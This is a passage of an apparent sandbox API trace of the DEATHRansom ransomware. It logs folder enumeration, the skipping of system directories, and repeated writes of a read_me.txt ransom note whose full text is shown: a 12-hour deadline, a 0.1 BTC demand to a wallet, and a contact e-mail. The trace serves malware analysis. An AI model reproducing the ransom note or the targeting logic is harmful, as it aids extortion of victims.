ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.028] WriteFile (in: hFile=0x8ac, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.029] CloseHandle (hObject=0x8ac) returned 1 [0076.029] GetProcessHeap () returned 0x4f10000 [0076.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0076.029] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcf7cd0, ftCreationTime.dwHighDateTime=0x1d4d120, ftLastAccessTime.dwLowDateTime=0x53bbcd90, ftLastAccessTime.dwHighDateTime=0x1d4c768, ftLastWriteTime.dwLowDateTime=0x53bbcd90, ftLastWriteTime.dwHighDateTime=0x1d4c768, nFileSizeHigh=0x0, nFileSizeLow=0xf8e4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="F6PZ6U_byBE9.mkv", cAlternateFileName="F6PZ6U~1.MKV")) returned 1 [0076.029] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\F6PZ6U_byBE9.mkv") returned 63 [0076.029] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcf7cd0, ftCreationTime.dwHighDateTime=0x1d4d120, ftLastAccessTime.dwLowDateTime=0x53bbcd90, ftLastAccessTime.dwHighDateTime=0x1d4c768, ftLastWriteTime.dwLowDateTime=0x53bbcd90, ftLastWriteTime.dwHighDateTime=0x1d4c768, nFileSizeHigh=0x0, nFileSizeLow=0xf8e4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="F6PZ6U_byBE9.mkv", cAlternateFileName="F6PZ6U~1.MKV")) returned 0 [0076.029] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.029] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\read_me.txt") returned 58 [0076.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f0 [0076.059] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.059] WriteFile (in: hFile=0x8f0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.060] CloseHandle (hObject=0x8f0) returned 1 [0076.060] GetProcessHeap () returned 0x4f10000 [0076.060] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b900d0 | out: hHeap=0x4f10000) returned 1 [0076.060] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4e3390, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0xe2598530, ftLastAccessTime.dwHighDateTime=0x1d4c919, ftLastWriteTime.dwLowDateTime=0xe2598530, ftLastWriteTime.dwHighDateTime=0x1d4c919, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="wD9B", cAlternateFileName="")) returned 1 [0076.060] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B") returned 45 [0076.060] lstrcmpW (lpString1="wD9B", lpString2="..") returned 1 [0076.060] lstrcmpW (lpString1="wD9B", lpString2=".") returned 1 [0076.060] StrStrW (lpFirst="wd9b", lpSrch="programdata") returned 0x0 [0076.060] StrStrW (lpFirst="wd9b", lpSrch="$recycle.bin") returned 0x0 [0076.060] StrStrW (lpFirst="wd9b", lpSrch="program files") returned 0x0 [0076.060] StrStrW (lpFirst="wd9b", lpSrch="windows") returned 0x0 [0076.060] StrStrW (lpFirst="wd9b", lpSrch="all users") returned 0x0 [0076.060] StrStrW (lpFirst="wd9b", lpSrch="appdata") returned 0x0 [0076.060] GetProcessHeap () returned 0x4f10000 [0076.060] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0076.060] lstrcpyW (in: lpString1=0x8b00088, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B" [0076.060] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 92 [0076.060] QueueUserWorkItem (Function=0x40a710, Context=0x8b00088, Flags=0x0) returned 1 [0076.060] GetProcessHeap () returned 0x4f10000 [0076.060] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0076.061] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\*") returned 47 [0076.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4e3390, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0xe2598530, ftLastAccessTime.dwHighDateTime=0x1d4c919, ftLastWriteTime.dwLowDateTime=0xe2598530, ftLastWriteTime.dwHighDateTime=0x1d4c919, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.061] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\.") returned 47 [0076.061] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.061] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.061] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4e3390, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0xe2598530, ftLastAccessTime.dwHighDateTime=0x1d4c919, ftLastWriteTime.dwLowDateTime=0xe2598530, ftLastWriteTime.dwHighDateTime=0x1d4c919, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.061] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\..") returned 48 [0076.061] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.061] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80182910, ftCreationTime.dwHighDateTime=0x1d4c5b0, ftLastAccessTime.dwLowDateTime=0x84c6acd0, ftLastAccessTime.dwHighDateTime=0x1d4c63b, ftLastWriteTime.dwLowDateTime=0x84c6acd0, ftLastWriteTime.dwHighDateTime=0x1d4c63b, nFileSizeHigh=0x0, nFileSizeLow=0x930c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="d7tz8cUHthJmDnjI1oaE.swf", cAlternateFileName="D7TZ8C~1.SWF")) returned 1 [0076.061] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\d7tz8cUHthJmDnjI1oaE.swf") returned 70 [0076.061] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3066b260, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0x1a1db3c0, ftLastAccessTime.dwHighDateTime=0x1d4c540, ftLastWriteTime.dwLowDateTime=0x1a1db3c0, ftLastWriteTime.dwHighDateTime=0x1d4c540, nFileSizeHigh=0x0, nFileSizeLow=0x4cd4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dE6a.avi", cAlternateFileName="")) returned 1 [0076.061] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\dE6a.avi") returned 54 [0076.061] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c620760, ftCreationTime.dwHighDateTime=0x1d4d2e7, ftLastAccessTime.dwLowDateTime=0xe5a70de0, ftLastAccessTime.dwHighDateTime=0x1d4c679, ftLastWriteTime.dwLowDateTime=0xe5a70de0, ftLastWriteTime.dwHighDateTime=0x1d4c679, nFileSizeHigh=0x0, nFileSizeLow=0x7755, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mqpdda7r45ju71WgcCTp.mkv", cAlternateFileName="MQPDDA~1.MKV")) returned 1 [0076.061] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\mqpdda7r45ju71WgcCTp.mkv") returned 70 [0076.061] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ef14c80, ftCreationTime.dwHighDateTime=0x1d4d26c, ftLastAccessTime.dwLowDateTime=0xb2815e70, ftLastAccessTime.dwHighDateTime=0x1d4d2ea, ftLastWriteTime.dwLowDateTime=0xb2815e70, ftLastWriteTime.dwHighDateTime=0x1d4d2ea, nFileSizeHigh=0x0, nFileSizeLow=0xfd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Rq-FcdG3-15f.flv", cAlternateFileName="RQ-FCD~1.FLV")) returned 1 [0076.061] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\Rq-FcdG3-15f.flv") returned 62 [0076.061] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80295800, ftCreationTime.dwHighDateTime=0x1d4c7dd, ftLastAccessTime.dwLowDateTime=0xef683870, ftLastAccessTime.dwHighDateTime=0x1d4c8ce, ftLastWriteTime.dwLowDateTime=0xef683870, ftLastWriteTime.dwHighDateTime=0x1d4c8ce, nFileSizeHigh=0x0, nFileSizeLow=0x17e42, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rU_BrzhcrHdZtvUPIz.avi", cAlternateFileName="RU_BRZ~1.AVI")) returned 1 [0076.062] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\rU_BrzhcrHdZtvUPIz.avi") returned 68 [0076.062] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e5700, ftCreationTime.dwHighDateTime=0x1d4d3b7, ftLastAccessTime.dwLowDateTime=0x88761bf0, ftLastAccessTime.dwHighDateTime=0x1d4cf1d, ftLastWriteTime.dwLowDateTime=0x88761bf0, ftLastWriteTime.dwHighDateTime=0x1d4cf1d, nFileSizeHigh=0x0, nFileSizeLow=0xb7fc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rY1pBDpLHJLMgoo.swf", cAlternateFileName="RY1PBD~1.SWF")) returned 1 [0076.062] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\rY1pBDpLHJLMgoo.swf") returned 65 [0076.062] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73cd16f0, ftCreationTime.dwHighDateTime=0x1d4cf9e, ftLastAccessTime.dwLowDateTime=0x4c405f30, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0x4c405f30, ftLastWriteTime.dwHighDateTime=0x1d4d146, nFileSizeHigh=0x0, nFileSizeLow=0xa32f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zw5yCF4m.mkv", cAlternateFileName="")) returned 1 [0076.062] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\zw5yCF4m.mkv") returned 58 [0076.062] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73cd16f0, ftCreationTime.dwHighDateTime=0x1d4cf9e, ftLastAccessTime.dwLowDateTime=0x4c405f30, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0x4c405f30, ftLastWriteTime.dwHighDateTime=0x1d4d146, nFileSizeHigh=0x0, nFileSizeLow=0xa32f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zw5yCF4m.mkv", cAlternateFileName="")) returned 0 [0076.062] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.062] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\read_me.txt") returned 57 [0076.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f0 [0076.062] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.062] WriteFile (in: hFile=0x8f0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.063] CloseHandle (hObject=0x8f0) returned 1 [0076.063] GetProcessHeap () returned 0x4f10000 [0076.063] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0076.063] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x8933d250, ftLastAccessTime.dwHighDateTime=0x1d4c8a9, ftLastWriteTime.dwLowDateTime=0x8933d250, ftLastWriteTime.dwHighDateTime=0x1d4c8a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="xwJZblUZL", cAlternateFileName="XWJZBL~1")) returned 1 [0076.063] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL") returned 50 [0076.063] lstrcmpW (lpString1="xwJZblUZL", lpString2="..") returned 1 [0076.063] lstrcmpW (lpString1="xwJZblUZL", lpString2=".") returned 1 [0076.063] StrStrW (lpFirst="xwjzbluzl", lpSrch="programdata") returned 0x0 [0076.063] StrStrW (lpFirst="xwjzbluzl", lpSrch="$recycle.bin") returned 0x0 [0076.063] StrStrW (lpFirst="xwjzbluzl", lpSrch="program files") returned 0x0 [0076.063] StrStrW (lpFirst="xwjzbluzl", lpSrch="windows") returned 0x0 [0076.064] StrStrW (lpFirst="xwjzbluzl", lpSrch="all users") returned 0x0 [0076.064] StrStrW (lpFirst="xwjzbluzl", lpSrch="appdata") returned 0x0 [0076.064] GetProcessHeap () returned 0x4f10000 [0076.064] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0076.064] lstrcpyW (in: lpString1=0x8c20008, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL" [0076.064] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 93 [0076.064] QueueUserWorkItem (Function=0x40a710, Context=0x8c20008, Flags=0x0) returned 1 [0076.064] GetProcessHeap () returned 0x4f10000 [0076.064] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b900d0 [0076.064] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\*") returned 52 [0076.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x8933d250, ftLastAccessTime.dwHighDateTime=0x1d4c8a9, ftLastWriteTime.dwLowDateTime=0x8933d250, ftLastWriteTime.dwHighDateTime=0x1d4c8a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.064] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\.") returned 52 [0076.064] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.064] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x8933d250, ftLastAccessTime.dwHighDateTime=0x1d4c8a9, ftLastWriteTime.dwLowDateTime=0x8933d250, ftLastWriteTime.dwHighDateTime=0x1d4c8a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.064] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\..") returned 53 [0076.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.064] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2c72c60, ftCreationTime.dwHighDateTime=0x1d4c660, ftLastAccessTime.dwLowDateTime=0x5d185f10, ftLastAccessTime.dwHighDateTime=0x1d4c63d, ftLastWriteTime.dwLowDateTime=0x5d185f10, ftLastWriteTime.dwHighDateTime=0x1d4c63d, nFileSizeHigh=0x0, nFileSizeLow=0x18513, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ev8FpKoRtOSaHWq-sk.mkv", cAlternateFileName="EV8FPK~1.MKV")) returned 1 [0076.064] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\ev8FpKoRtOSaHWq-sk.mkv") returned 73 [0076.064] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93478cf0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0x97a90b50, ftLastAccessTime.dwHighDateTime=0x1d4ca8b, ftLastWriteTime.dwLowDateTime=0x97a90b50, ftLastWriteTime.dwHighDateTime=0x1d4ca8b, nFileSizeHigh=0x0, nFileSizeLow=0x1331d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OxHI_zkRZQhTWMK.mkv", cAlternateFileName="OXHI_Z~1.MKV")) returned 1 [0076.064] wnsprintfW (in: 